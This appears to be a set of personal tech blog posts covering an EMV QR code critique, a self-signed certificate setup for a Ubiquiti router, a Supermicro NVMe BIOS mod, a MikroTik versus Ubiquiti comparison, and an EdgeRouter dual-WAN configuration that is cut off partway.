Many government authorities have created their QR code standards based on the EMV QR code: SGQR from Singapore, BR Code from Brazil, and so on.
Even though the EMV QR code is ubiquitous, I don’t think it was well designed from the beginning. Actually, to me, it looks like it was designed by someone with very little engineering rigor.
A QR code encodes a string, and the length of that string largely decides how complex the QR code is. Most of the time, the longer the string, the bigger the QR code. What does a bigger QR code imply? Users need a better smartphone with a better camera to read it, and the decoding process takes slightly longer. That may mean nothing to you, but there are many users on low-end or mid-range smartphones with less capable cameras. My point is that making a QR code shorter and smaller does matter.
Let’s look at how the EMV QR code standard works. Basically, it follows a TLV ([Type–length–value](https://en.wikipedia.org/wiki/Type%E2%80%93length%E2%80%93value)) format. TLV provides excellent extensibility: define a new Type, declare the Length of the value, append the Value, bingo. But is that the best you can do? Can you make the payload shorter while maintaining the extensibility? For example, can we combine the Type and Length, or even pre-define the length for certain types? Of course, this makes the standard more complex, but for efficiency’s sake it is well worth investing more in the standard. The end users, the consumers and the merchants, won’t be bothered by the complexity of encoding or decoding the QR code, as they never do it today. It’s the developers with sophisticated engineering knowledge who do the encoding and decoding, so a little complexity will surely buy a much more efficient QR code.
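To make the TLV mechanics concrete, here is a minimal sketch of an EMV-style codec in Python. The field IDs and values (00 = Payload Format Indicator, 53 = Transaction Currency, 54 = Transaction Amount) follow the standard’s scheme, but this is an illustration, not a compliant implementation; real payloads also nest templates and end with a CRC field.

```python
def tlv_encode(fields):
    """EMV QR style: 2-digit ID, 2-digit length, then the value itself."""
    return "".join(f"{tid:02d}{len(value):02d}{value}" for tid, value in fields)

def tlv_decode(payload):
    """Walk the string, reading ID and length to slice out each value."""
    fields, i = [], 0
    while i < len(payload):
        tid, length = int(payload[i:i+2]), int(payload[i+2:i+4])
        fields.append((tid, payload[i+4:i+4+length]))
        i += 4 + length
    return fields

fields = [(0, "01"), (53, "702"), (54, "99.34")]
payload = tlv_encode(fields)
print(payload)                        # 0002015303702540599.34
print(tlv_decode(payload) == fields)  # True
```

Notice that every field costs 4 bytes of ID-plus-length overhead before a single byte of value is written; that is the overhead the rest of this post complains about.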
The Type part of the TLV simply uses a 2-digit string, from “00” to “99”. Sigh. One byte can denote 2^8 = 256 values, and you spend 2 bytes to denote at most 100?!
OK, let’s talk about the Value part of TLV. Even there, EMV does a terrible job on efficiency. Look at how it denotes the transaction currency: a 3-digit numeric value, as defined by [ISO 4217]. It simply uses 3 bytes, where even two bytes would be wasteful for a number less than 1000. One byte can denote 2^8 = 256 values, while 10 bits can denote 2^10 = 1024, so 10 bits are more than enough. To design an efficient QR standard, we’d better count in bits instead of bytes! Someone may argue about readability. Please note that the value of a QR code is not designed for humans to read directly. Even with the existing EMV QR standard, one still needs a decoder to view the values of each field, so readability is a non-issue.
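To put a number on that: ISO 4217 numeric currency codes are three decimal digits, so the largest possible code is 999, and a quick check (just arithmetic, not any standard’s encoding) confirms that 10 bits are enough:

```python
max_code = 999                 # largest 3-digit ISO 4217 numeric code
print(max_code.bit_length())   # 10 bits are enough...
print(2 ** 10 - 1)             # ...since 10 bits cover 0..1023
```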
How about the transaction amount? From the standard: “The transaction amount (excluding tips and convenience fees), if known”, for instance “99.34”. Let’s use that example from the standard: “99.34” is 5 bytes! Come on, one simple solution is to use the minor-unit convention from ISO 4217 and simply put 9934, without a dot. Minor units are widely used and denote amounts as integers, without any concerns about floating-point values (floats cannot represent decimals precisely in a computer). Check the APIs from Stripe, or other well-designed APIs: they all use minor units to denote amounts of money. Only non-professionals like PayPal use a decimal string to denote money. OK, let’s say we use an int32 to denote money: only 4 bytes, and we can denote from -2,147,483,648 to +2,147,483,647. But what does it take to encode an amount of 21474836.47 under the EMV QR standard? It’s 11 bytes.
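Here is a quick comparison of the two encodings. This is a sketch; the big-endian int32 packing is my choice for illustration, not anything the EMV standard defines.

```python
import struct

# The same amount of money, encoded two ways.
as_decimal_string = "21474836.47".encode("ascii")   # how EMV QR carries it
as_minor_units = struct.pack(">i", 2147483647)      # cents in a big-endian int32

print(len(as_decimal_string))  # 11 bytes
print(len(as_minor_units))     # 4 bytes
```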
In summary: TLV, not efficient. T: not efficient. L: not efficient. V: not efficient. I don’t think the EMV QR code was designed with data efficiency in mind.
As mentioned earlier, the amount of money does not follow the minor-unit convention of ISO 4217. Even the CRC check does not follow the common convention. If you follow the Wikipedia algorithm to implement the CRC, you will find the result doesn’t match… Later, they revised the standard to mention that they use the polynomial ‘1021’ (hex) and initial value ‘FFFF’ (hex). The first version didn’t even mention those 2 parameters, leaving developers to guess and try. Can you imagine that? LOL.
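For reference, here is a straightforward bitwise implementation of that variant (polynomial 0x1021, initial value 0xFFFF, no reflection, no final XOR, commonly catalogued as CRC-16/CCITT-FALSE). Its well-known check value for the input “123456789” is 0x29B1.

```python
def crc16_ccitt_false(data: bytes) -> int:
    """CRC-16 with polynomial 0x1021 and initial value 0xFFFF (CRC-16/CCITT-FALSE)."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            # Shift left; XOR in the polynomial when the top bit falls out.
            crc = ((crc << 1) ^ 0x1021) if crc & 0x8000 else (crc << 1)
            crc &= 0xFFFF
    return crc

print(f"{crc16_ccitt_false(b'123456789'):04X}")  # 29B1
```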
In the EMV QR code standard, there is a field called Globally Unique Identifier, but no strict format is given for it. According to the spec, it is “an identifier that sets the context of the data that follows”, and the value is one of the following:
Well, if the value can be in any one of those formats, and possibly other formats as well, then how do we make sure it’s globally unique? To design a standard, it’s better to think it through. Is it going to be used in a centralised or decentralised way? Is the global uniqueness guaranteed by each country’s authorities, by the QR generators (merchants, for instance), by the merchant acquirers, or by the payment gateways? Is it possible to define it more strictly, and make it as short as possible while guaranteeing uniqueness? I don’t see that responsibility taken in this standard.
If the standard was designed so badly, why did so many countries’ authorities choose to use it? I don’t have an answer yet. These days, fewer and fewer people would like to think for themselves rather than follow others. Please do think; it’s a privilege of being human.
I’m not going to use a public domain name, nor will I issue a certificate through a public issuer such as Let’s Encrypt, which I have used extensively for my public websites. The reason is that I don’t want my router exposed to the public internet, and the less exposure, the better. Setting up a Let’s Encrypt certificate would most probably require me to verify that I own the domain name and the server, which means revealing my router’s public IP address, and that is not my intention.
With that, I’m going to generate a self-signed certificate with a generated CA for a domain name dedicated to my router (router.local). Then I will import the CA into the devices that need to access the router. Finally, I’ll map the router’s local IP address to the local domain name (router.local).
Now I’m going to show you how to achieve all of the above, step by step.
Here is the script. Copy and paste it into a file and run it on a Mac/Linux environment.
#!/bin/ksh
function CreateCertificateAuthority {
if [ -f ./ubntCA.key ]; then rm ./ubntCA.key; fi
if [ -f ./ubntCA.pem ]; then rm ./ubntCA.pem; fi
#
# Create the Root Key
#
openssl genrsa -out ubntCA.key 4096
#
# Now self-sign this certificate using the root key.
#
# CN: CommonName
# OU: OrganizationalUnit
# O: Organization
# L: Locality
# S: StateOrProvinceName
# C: CountryName
#
openssl req -x509 \
-new \
-nodes \
-key ubntCA.key \
-sha256 \
-days 36500 \
-subj "/C=US/ST=IS/L=TOTALLY/O=CONFUSED/OU=HERE/CN=LIANGSUN.ORG" \
-out ubntCA.pem
print ""
print "Now install this cert (ubntCA.pem) in your workstations Trusted Root Authority."
print ""
}
function CreateServerCertificate {
if [ -f ./server.key ]; then rm ./server.key; fi
if [ -f ./server.csr ]; then rm ./server.csr; fi
if [ -f ./server.crt ]; then rm ./server.crt; fi
#
# Create A Certificate
#
openssl genrsa -out server.key 4096
#
# Now generate the certificate signing request.
#
openssl req -new \
-key server.key \
-subj "/C=US/ST=IS/L=ALSOTOTALLY/O=CONFUSED/OU=HERE/CN=ROUTER.LOCAL" \
-out server.csr
#
# Now generate the final certificate from the signing request.
#
openssl x509 -req \
-in server.csr \
-CA ubntCA.pem \
-CAkey ubntCA.key \
-CAcreateserial \
-extfile <(printf "subjectAltName=DNS:ROUTER.LOCAL,IP:172.10.0.1,IP:172.20.0.1,IP:172.30.0.1,IP:192.168.0.1,IP:192.168.1.1") \
-out server.crt -days 36500 -sha256
}
function CreateServerPem {
cat server.crt > server.pem
cat server.key >> server.pem
}
CreateCertificateAuthority
CreateServerCertificate
CreateServerPem
This script will generate several files; among them, two are important to us: ubntCA.pem and server.pem. The file ubntCA.pem is the one we need to import into the devices that need to access the router.
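Before importing anything, it doesn’t hurt to check that a server certificate really chains back to its CA; openssl verify does that. Here is a self-contained demo with throwaway names (demoCA.*, my own naming); the same one-line check applies to the ubntCA.pem and server.crt produced by the script above.

```shell
# Self-contained demo: create a throwaway CA and a server cert signed by it,
# then verify the chain the same way you would for ubntCA.pem / server.crt.
tmp=$(mktemp -d) && cd "$tmp"
openssl genrsa -out demoCA.key 2048
openssl req -x509 -new -nodes -key demoCA.key -sha256 -days 30 \
    -subj "/CN=DEMO-CA" -out demoCA.pem
openssl genrsa -out server.key 2048
openssl req -new -key server.key -subj "/CN=router.local" -out server.csr
openssl x509 -req -in server.csr -CA demoCA.pem -CAkey demoCA.key \
    -CAcreateserial -out server.crt -days 30 -sha256
openssl verify -CAfile demoCA.pem server.crt   # prints: server.crt: OK
```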
As an example, to import the CA into a Windows system, run this command in a Command Prompt with Administrator access.
certutil -addstore -enterprise -f "Root" ubntCA.pem
From the last step, we also have a file called server.pem. This is the file we need to install onto the router. We can use the scp command to copy it to the router, like this:
scp server.pem USER@172.10.0.1:~/
Here, USER is the username, and 172.10.0.1 is the IP address of the router.
Open an SSH connection to the router, and copy the file to the lighttpd server configuration folder:
cd /etc/lighttpd
sudo mv server.pem server.pem.bk
sudo cp /home/USER/server.pem ./
Then restart the lighttpd server:
sudo killall lighttpd
sudo /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
Of course, we could modify each client’s hosts file to map the domain router.local to the IP of the router (in this case 172.10.0.1), but I want to do this in a smarter way, so that clients don’t need to modify their hosts files manually. I’m going to configure the router itself.
Again, SSH into the router and run the configure command to enter the configuration shell.
Then run the following command:
set system static-host-mapping host-name router.local inet 172.10.0.1
commit
save
Probably there is a way to configure this in the Web UI as well, but since the CLI handles it faster, I didn’t bother to look for it.
Now we can access the router on a client side without the certificate error. Just open https://router.local on a client that has imported the CA.
Last question: what if a user opens https://172.10.0.1, the IP address of the router? They will still get an SSL certificate error.
To resolve the last problem and make this solution perfect, follow the next step.
Again, SSH into the router, go to the folder /etc/lighttpd/conf-enabled, and create a new file called 11-redirect.conf with the following content.
$HTTP["scheme"] == "https" {
$HTTP["host"] =~ "^\d+\.\d+\.\d+\.\d+$" {
url.redirect = (
"^(.*)$" => "https://router.local$1"
)
}
}
Then edit the file /etc/lighttpd/lighttpd.conf to include the new config file.
include "conf-enabled/10-ssl.conf"
include "conf-enabled/11-redirect"
include "conf-enabled/15-fastcgi-python.conf"
Add the second line, in the same way as the existing 10-ssl.conf and 15-fastcgi-python.conf lines.
Now restart the lighttpd server again.
sudo killall lighttpd
sudo /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
Now, https://172.10.0.1 will be redirected to https://router.local without a certificate warning.
So far, everything works. But one day you reboot your router and find the server certificate has been regenerated. To make the change permanent, we need to save it in the configuration.
Log in to the router via SSH, copy the server.pem file into the folder /config/auth/, and run the following commands:
configure
set service gui cert-file /config/auth/server.pem
commit
save
Run this command to confirm everything is in order:
ubnt# show service gui
It will show the following:
cert-file /config/auth/server.pem
http-port 80
https-port 443
listen-address 172.20.0.1
older-ciphers disable
By the way, you should always set the listen-address to a local IP address for both the gui and ssh services. This prevents the router from being accessed from the public internet; I see no reason why Ubiquiti doesn’t set it as the default.
Congratulations, you have a perfect solution!
I kept telling myself not to modify or re-flash BIOS/UEFI for a long time. Why? I thought the stability of a motherboard was super important, and if I did, I could break it. Besides, if the power goes out while flashing a new BIOS, I could permanently lose the motherboard. Do I have to buy a UPS first? I’m not rich enough to buy a UPS without considering the cost. If you would like to sponsor one, please let me know.
These days, I’m playing with some Supermicro motherboards. One of the most important reasons I like Supermicro is IPMI/BMC. With IPMI, I don’t need to physically connect a monitor to the machine anymore. I can do anything remotely: install a new operating system, change BIOS settings, or even upgrade the BIOS.
IPMI gives me confidence that I can play with BIOS now. Even if I flash with a corrupt BIOS file, then I can flash it back. So there is nothing to worry about.
Now the only thing left was a fuse to light, and today it came. I bought an X9SCA-F for building my home NAS, a 10-Gigabit NAS.
Motherboard: X9SCA-F
CPU: Xeon E3 1220 V2
RAM: 2x 8GB unbuffered ECC DIMM
SSD: 2x Samsung 970 Evo Plus NVMe M.2 1TB
Network card: Mellanox dual 10Gb ConnectX-3
Looks good, right? The only problem is that the X9SCA-F doesn’t support NVMe M.2, because it’s quite an old product from 2013; now it’s 2020, so seven years have passed.
After doing some research, I found it’s possible to mod the motherboard BIOS to support NVMe!
What I did was just follow this post: https://www.win-raid.com/t871f50-Guide-How-to-get-full-NVMe-support-for-all-Systems-with-an-AMI-UEFI-BIOS.html and it’s quite straightforward. With a tool called UEFITool (from CodeRush), I modded the BIOS in about 15 minutes. Of course, I needed to install Windows in VirtualBox beforehand.
Now I have an X9SCA-F motherboard with NVMe support. Isn’t that amazing?
Update: It turns out the X9SCA-F motherboard has a 5 Gbps bandwidth limit on its PCIe ports, so it’s not possible to reach my home NAS goal of 10 Gb or even 20 Gb. With that, I’ve decided to upgrade my motherboard to an X10SLM+-F/X10SLL+-F or X10SRi-F/X10SRL-F/X10SRH-CF/X10SRH-CLN4F.
Today, I want to talk about equipment from the two vendors that straddle the consumer and enterprise markets: MikroTik and Ubiquiti. They offer enterprise quality without real-time tech support, which is perfect for technical people with a pursuit of quality and speed.
So what would you consider when choosing a router or switch? I don’t know about you, but I would consider (from most important to least important): Security > Reliability > Noise Level > Performance (Throughput) > Hardware Interface > Scalability > User Experience > Power Source > Power Cost > Technical Support > Rack Mount
Security matters more for routers than for switches, because routers communicate with the internet directly, while switches usually reside inside an intranet.
Security Vulnerabilities Published In 2018 for MikroTik RouterOS: https://www.cvedetails.com/vulnerability-list/vendor_id-12508/product_id-23641/year-2018/Mikrotik-Routeros.html
Security Vulnerabilities Published In 2018 for Ubiquiti EdgeOS: https://www.cvedetails.com/vulnerability-list/vendor_id-12765/product_id-44469/year-2018/Ubnt-Edgeos.html
Comparing these two, Ubiquiti is slightly better than MikroTik. There was one CVE from MikroTik, CVE-2018-7445 (code execution via buffer overflow), scored 10.0 (the highest severity). The detail of this CVE:
A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request messages. Remote attackers with access to the service can exploit this vulnerability and gain code execution on the system. The overflow occurs before authentication takes place, so an unauthenticated, remote attacker can exploit it. All architectures and all devices running RouterOS before versions 6.41.3/6.42rc27 are vulnerable.
I hope no one is using an internet-facing router to serve SMB, because it’s too risky. A simple nmap scan exposes it as an SMB server, and it’s not that difficult to exploit a file-sharing service like SMB. In other words, we should always put a file-sharing service on a switch, inside the network. But unfortunately, no MikroTik switch supports an NVMe M.2 interface like their high-end routers do, so this feature is useless for high-speed local storage. Even if one existed, their SMB service only supports SMB 1.0, and only SMB 3.0 or above can aggregate bandwidth across different links. So I would suggest MikroTik focus on what a router is supposed to do and let end users build their own professional high-speed local NAS. Ubiquiti doesn’t have this feature at all, nor do they support NVMe storage in their routers, so no such issues for Ubiquiti.
For switches, security is less critical because we usually access them from inside the network. Still, a minus point for SwOS: it doesn’t support changing the default admin user name. I know most new MikroTik switches (the CRS, Cloud Router Switch, series) support both SwOS and RouterOS, and RouterOS doesn’t have this issue, but still, some would prefer the older and more cost-effective CSS (Cloud Smart Switch) series. Ubiquiti’s UI does support this, but it’s not so apparent to end users: we need to switch to the legacy UI to do so, rather than the default new UI, or use the CLI.
From my personal experience, MikroTik is slightly better than Ubiquiti on reliability. It might be because I purchased an EdgeSwitch 2 years ago, and before the v1.8.3 release, I was hit several times by this issue:
https://community.ui.com/questions/Losing-access-to-switches-Regulary-Regreting-buying-Ubiquiti/5202e750-f497-40d0-a00d-908c8c2a3d0a
With the v1.8.3 release, they added some mitigations, but the issue is still not 100% resolved after 2 years. It seems the root cause has still not been found.
MikroTik’s SwOS v2.5 in 2017 was infamous on the CxS326 platform, as there were issues with the 10GbE port performance. The fix was simple: downgrade to v2.4. These issues have since been fixed.
Ubiquiti’s EdgeRouter ER-X also had some reliability issues with the v2.x firmware. I downgraded to v1.x, and so far it has been OK for half a year. If you check their firmware download page now, you will find 2 versions (as of writing, 29 May 2020):
I assume v2 is still not stable, because there is a hotfix suffix in that build name, which means there was a critical bug before that build.
Right now, I’m sticking with v1.10.11 for the ER-X (not going to v2 for a long time) and v1.8.5 for the EdgeSwitch (not going to v1.9 for a long time).
Users also complain about Ubiquiti’s firmware version naming. Instinctively, people would think v2 is better than v1, but that’s not the case for Ubiquiti: in the ER-X’s case, v2 is experimental, while v1 is the stable version. This issue doesn’t happen with MikroTik, which separates its releases into 4 channels: long-term, stable, testing, and development. I always choose the stable or long-term versions of RouterOS.
It all depends on where you put your equipment. If it’s for a home lab, for sure, you don’t want a MikroTik CRS354-48G-4S+2Q+RM because it’s too noisy unless you have a good rack cabinet and put it somewhere far from your living and working place.
Both Ubiquiti and MikroTik have quiet/fanless solutions. We only need to choose the right models. For POE switches, of course, we need fans, and if you are searching for solutions to modify the fans with some quiet ones, I don’t have any experience to share with you. Good luck!
MikroTik has a much higher performance than Ubiquiti for products in the same price segments. A few examples:
Ubiquiti ER-12, measured with firmware v1.9.7:

| Mode | Configuration | 1518 byte kpps | 1518 byte Mbps | 512 byte kpps | 512 byte Mbps | 64 byte kpps | 64 byte Mbps |
| --- | --- | --- | --- | --- | --- | --- | --- |
| Routing | none (fast path) | 650 | 8,000 | | | 3,400 | 1,800 |
Data source: https://www.ui.com/edgemax/comparison/
RB4011iGS+RM, AL21400, 1G/S+ all-port test:

| Mode | Configuration | 1518 byte kpps | 1518 byte Mbps | 512 byte kpps | 512 byte Mbps | 64 byte kpps | 64 byte Mbps |
| --- | --- | --- | --- | --- | --- | --- | --- |
| Bridging | none (fast path) | 806 | 9,792 | 2,312 | 9,473 | 5,509 | 2,821 |
| Bridging | 25 bridge filter rules | 806 | 9,792 | 1,037 | 4,249 | 1,153 | 590 |
| Routing | none (fast path) | 806 | 9,792 | 1,923 | 7,877 | 5,092 | 2,607 |
| Routing | 25 simple queues | 806 | 9,792 | 1,046 | 4,286 | 960 | 491 |
| Routing | 25 ip filter rules | 593 | 7,209 | 625 | 2,560 | 564 | 289 |
Data source: https://mikrotik.com/product/rb4011igs_rm with corrections on some data.
I don’t understand why MikroTik made some basic mistakes with the , and . notation in their test data, so I had to make corrections so that the numbers add up.
Please also note that the Mbps throughput values above for Ubiquiti seem to be the real data rate excluding packet overhead, while the MikroTik data includes the packet overhead.
Even accounting for all that overhead and those mistakes, MikroTik still has higher performance.
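As a sanity check on those tables (my own back-of-the-envelope arithmetic, not vendor data), kpps and frame size convert to Mbps like this:

```python
def kpps_to_mbps(kpps, frame_bytes):
    """Kilopackets/s to Mbit/s, counting frame bytes only
    (no Ethernet preamble or inter-frame gap)."""
    return kpps * 1000 * frame_bytes * 8 / 1e6

# MikroTik's 1518-byte fast-path figure:
print(round(kpps_to_mbps(806, 1518)))   # 9788, close to the listed 9,792
```

The near-exact match for MikroTik’s row suggests their Mbps column counts full frame bytes, which is consistent with the note above about overhead.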
The ES-24-LITE has a throughput of 26 Gbps, and the CRS326-24G-2S+RM has a throughput of 33+ Gbps. That simple comparison may not be fair, though.
In terms of hardware interfaces, MikroTik is much more aggressive, and Ubiquiti looks conservative in general. You will see more SFP+ ports on MikroTik products, while Ubiquiti only offers SFP ports in the same price segments.
One example is the comparison between CRS326-24G-2S+RM and ES-24-LITE we just talked about above.
Another example is MikroTik CRS354-48G-4S+2Q+RM (suggested price $499) and Ubiquiti ES-48-LITE (suggested price $460). CRS354-48G-4S+2Q+RM has 48 Gigabit Ethernet ports, 4 10-Gigabit SFP+ ports, and 2 40-Gigabit QSFP ports. In comparison, ES-48-LITE only has 48 Gigabit Ethernet ports, 2 Gigabit SFP ports and 2 10-Gigabit SFP+ ports.
There is also one product where I found Ubiquiti has an advantage over MikroTik: MikroTik’s CRS312-4C+8XG-RM (suggested price $599) versus Ubiquiti’s US‑16‑XG ($599, but out of stock at the moment, 30 May 2020). The CRS312-4C+8XG-RM has 4 combo 10-Gigabit Ethernet/SFP+ ports (for each combo port, users can choose either a 10-Gigabit Ethernet port or a 10-Gigabit SFP+ port) and 8 10-Gigabit Ethernet ports. In comparison, the US‑16‑XG has 12 10-Gigabit SFP+ ports and 4 10-Gigabit Ethernet ports.
MikroTik has very limited scalability, but Ubiquiti is doing quite well here.
Ubiquiti develops a centralized management software called UNMS (Ubiquiti Network Management System). It provides 2 options: users can either host UNMS themselves or use the free hosted UNMS provided by Ubiquiti if they have at least 10 Ubiquiti devices. With UNMS, we can manage thousands of devices across multiple sites and scale the network as needed, without any ongoing licensing fees. For UniFi-series devices, we can also use the UniFi Controller, another centralized management tool.
When you have more than 10 devices, including routers, switches, and wireless APs, I would strongly suggest you use Ubiquiti products rather than MikroTik.
For example, say you have 3 apartments, each with one router, one switch, and 2 wireless APs; it could be a burden to manage those devices, and you would want to upgrade firmware remotely with one click. Or maybe you have one big detached house and need to install 10 wireless APs; then again, better to choose Ubiquiti. Of course, firmware upgrades may not be that frequent for network devices we expect to run for a reasonably long time. Another benefit of a centralized management system is that when issues happen, we can quickly get a basic idea of which part of the system went wrong, and most probably come up with a fast solution.
On the other hand, if you are sure that you won’t have many devices and scalability is not an issue for you, or you think everything is still manageable, then maybe MikroTik is not a bad choice.
Ubiquiti is slightly better than MikroTik in terms of user experience.
MikroTik provides a native desktop app called WinBox, but sadly it only supports Windows and won’t work on macOS; for the newer versions, even the Wine workaround fails. WinBox is very useful when users make stupid mistakes with IP addresses: it can connect to routers/switches without an IP address at all. How? It connects directly via MAC address. That’s a feature Ubiquiti doesn’t provide. For Ubiquiti devices, in case we mess up the IP addresses, the only way out is to reset to factory settings and start over. Professional network engineers probably make IP mistakes very rarely, but as a non-professional, I have made such mistakes several times.
Both MikroTik and Ubiquiti provide Web and CLI (Command-Line Interface) management. MikroTik’s UI is more straightforward, while Ubiquiti’s UI looks well designed by UI/UX designers, and maybe also product managers, rather than coming from software engineers alone.
Again, UNMS is more user-friendly when managing more than 10 devices. UNMS is fantastic, and once you’ve tried it, maybe you’ll never want to go back to the old days. UNMS alone makes Ubiquiti’s user experience better than MikroTik’s.
Some MikroTik devices, for instance the RB4011iGS+RM, have a way-too-bright power status LED, which many users have complained about, but it seems MikroTik doesn’t bother to care. On the contrary, Ubiquiti devices look more decent.
MikroTik products tend to provide redundant power sources. As an example, the CSS326-24G-2S+RM has a DC input and also a PoE in. Technically, this makes it a dual-power-supply switch, and the PoE side can be latched and fed from a higher-quality power source. The Ubiquiti UnifiSwitch-24 only has one AC input, as does the Ubiquiti EdgeSwitch 24.
As an extreme example, MikroTik CRS305-1G-4S+IN even has 2 DC inputs and also a POE in, which technically makes it a triple power supply switch.
Sometimes, the preferred power method depends on whether we put the device in a rack. Usually, for a rack-mountable device, we prefer AC power to DC, because a DC adapter is quite big and it’s not easy to find a place to plug it in on a rack. However, for non-rack-mount devices, DC power is more cost-effective.
The UnifiSwitch-24 has one AC input, which is better than the CSS326-24G-2S+RM, but the latter has a PoE in, which the former doesn’t have.
I can’t say which is better; it depends on what you need and what you prefer.
We don’t need to consider power cost for a home lab, because we are not running thousands of devices at the same time, and for devices drawing less than 100 W, we just don’t care.
Both MikroTik and Ubiquiti offer limited technical support. Most of the time, we depend on their forums for answers, and that is the fun part, isn’t it?
Most Ubiquiti devices are rack-mountable with an additional rack-mount kit, which they sell separately. MikroTik has rack-mount versions of their products, marked with an RM suffix in the product name, for example RB4011iGS+RM; it also has non-rack-mount versions, for example the CCR1009-7G-1C-PC.
Ubiquiti has a very user-friendly forum where beginners can learn almost all the technologies for the EdgeRouter X. However, for the second issue (if you think it’s an issue), I couldn’t find anything on the internet. Probably it’s not that popular in China? Anyway, here is the story.
Dual WAN, both connecting through PPPoE: eth0 carries pppoe0 (WAN0), and eth1 carries pppoe1 (WAN1).
The first configuration is an easy one: the DNS name server. With dual WAN, we should set a name server at the system level instead of using the one automatically retrieved from the ISP. Commands:
set interfaces ethernet eth0 pppoe 0 name-server none
set system name-server 114.114.114.114
(Reference: https://community.ui.com/questions/PPPoE-and-DNS-issues/c6ea0bb1-9a29-45c4-9aa5-eff94ef9f65b)
The second issue is not so obvious. I found it by reading the message logs in /var/log/messages: once in a while, the load balancer became inactive and then, after a while, became active again, repeatedly.
$ tail /var/log/messages
Feb 13 08:55:38 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe0 reachability changes to unreachable.
Feb 13 08:55:38 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe0 state changes to inactive.
Feb 13 08:55:38 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe1 reachability changes to unreachable.
Feb 13 08:55:38 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe1 state changes to inactive.
Feb 13 08:56:23 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe0 reachability changes to reachable.
Feb 13 08:56:23 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe0 state changes to active.
Feb 13 08:56:23 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe1 reachability changes to reachable.
Feb 13 08:56:23 ubnt ubnt-util: WLB: Load-Balance group G interface pppoe1 state changes to active.
By checking the connections, I saw some strange connections to 8.8.8.8, which I never set as a DNS server anywhere.
sudo conntrack -L
icmp 1 13 src=**** dst=8.8.8.8 type=8 code=0 id=26922 src=8.8.8.8 dst=**** type=0 code=0 id=26922 mark=1694498816 use=1
udp 17 177 src=**** dst=8.8.8.8 sport=26528 dport=53 src=8.8.8.8 dst=**** sport=53 dport=26528 [ASSURED] mark=1686110208 use=1
After a thorough read of https://help.ubnt.com/hc/en-us/articles/205145990-EdgeMAX-Dual-WAN-Load-Balance-Feature, I learned that the load balancer’s default behavior is to ping 8.8.8.8 every minute; if the ping fails, it sets that interface’s reachability to unreachable and redirects all traffic to the other one. With that knowledge, it’s an easy fix:
set load-balance group G interface pppoe0 route-test type ping target 114.114.114.114
set load-balance group G interface pppoe1 route-test type ping target 114.114.114.114
Also, we can tune the failure count and interval parameters to make this even more robust and reliable. The final settings for each interface:
route-test {
count {
failure 6
success 6
}
initial-delay 1
interval 10
type {
ping {
target 114.114.114.114
}
}
}
I hope you enjoyed reading this article. If you faced the same issue and found this article helpful, please comment below and let me know.
Here is the full configuration:
firewall {
all-ping enable
broadcast-ping enable
group {
network-group PRIVATE_NETS {
network 192.168.0.0/16
network 172.16.0.0/12
network 10.0.0.0/8
}
}
ipv6-receive-redirects disable
ipv6-src-route disable
ip-src-route disable
log-martians disable
modify balance {
rule 60 {
action modify
modify {
table 11
}
source {
address 192.168.1.13-192.168.1.16
}
}
rule 70 {
action modify
modify {
table 12
}
source {
address 192.168.1.11-192.168.1.12
}
}
rule 80 {
action modify
modify {
lb-group G
}
}
}
options {
mss-clamp {
mss 1452
}
}
receive-redirects disable
send-redirects enable
source-validation disable
syn-cookies enable
}
interfaces {
ethernet eth0 {
description "WAN 0"
duplex auto
pppoe 0 {
default-route none
description "China Telecommunication"
mtu 1492
name-server none
password ****
user-id ****
}
speed auto
}
ethernet eth1 {
description "WAN 1"
duplex auto
pppoe 1 {
default-route none
description "China Unicom"
mtu 1492
name-server none
password ****
user-id ****
}
speed auto
}
ethernet eth2 {
duplex auto
speed auto
}
ethernet eth3 {
duplex auto
speed auto
}
ethernet eth4 {
duplex auto
speed auto
}
loopback lo {
}
switch switch0 {
address 192.168.1.1/24
description Local
firewall {
in {
modify balance
}
}
mtu 1492
switch-port {
interface eth2 {
}
interface eth3 {
}
interface eth4 {
}
vlan-aware disable
}
}
}
load-balance {
group G {
exclude-local-dns disable
flush-on-active enable
gateway-update-interval 20
interface pppoe0 {
route-test {
count {
failure 6
success 6
}
initial-delay 1
interval 10
type {
ping {
target 114.114.114.114
}
}
}
weight 70
}
interface pppoe1 {
route-test {
count {
failure 6
success 6
}
initial-delay 1
interval 10
type {
ping {
target 114.114.114.114
}
}
}
weight 30
}
lb-local enable
lb-local-metric-change disable
sticky {
source-addr enable
}
}
}
port-forward {
auto-firewall disable
hairpin-nat disable
wan-interface pppoe0
}
protocols {
static {
interface-route 0.0.0.0/0 {
next-hop-interface pppoe0 {
}
next-hop-interface pppoe1 {
}
}
table 11 {
interface-route 0.0.0.0/0 {
next-hop-interface pppoe0 {
}
}
}
table 12 {
interface-route 0.0.0.0/0 {
next-hop-interface pppoe1 {
}
}
}
}
}
service {
dhcp-server {
disabled false
hostfile-update disable
shared-network-name LAN {
authoritative enable
subnet 192.168.1.0/24 {
default-router 192.168.1.1
dns-server 192.168.1.1
lease 86400
start 192.168.1.38 {
stop 192.168.1.243
}
static-mapping 12 {
ip-address 192.168.1.12
mac-address ****
}
static-mapping 11 {
ip-address 192.168.1.11
mac-address ****
}
static-mapping EdgeSwitch {
ip-address 192.168.1.2
mac-address ****
}
static-mapping 13 {
ip-address 192.168.1.13
mac-address ****
}
static-mapping 14 {
ip-address 192.168.1.14
mac-address ****
}
static-mapping 15 {
ip-address 192.168.1.15
mac-address ****
}
static-mapping 16 {
ip-address 192.168.1.16
mac-address ****
}
}
}
static-arp disable
use-dnsmasq disable
}
dns {
forwarding {
cache-size 2000
listen-on switch0
}
}
gui {
http-port 80
https-port 443
older-ciphers disable
}
nat {
rule 1 {
description 11
destination {
port 47900-47910
}
inbound-interface pppoe1
inside-address {
address 192.168.1.11
port 47900-47910
}
log disable
protocol tcp_udp
type destination
}
rule 2 {
description 12
destination {
port 47800-47810
}
inbound-interface pppoe1
inside-address {
address 192.168.1.12
port 47800-47810
}
log disable
protocol tcp_udp
type destination
}
rule 3 {
description 13
destination {
port 47300-47310
}
inbound-interface pppoe0
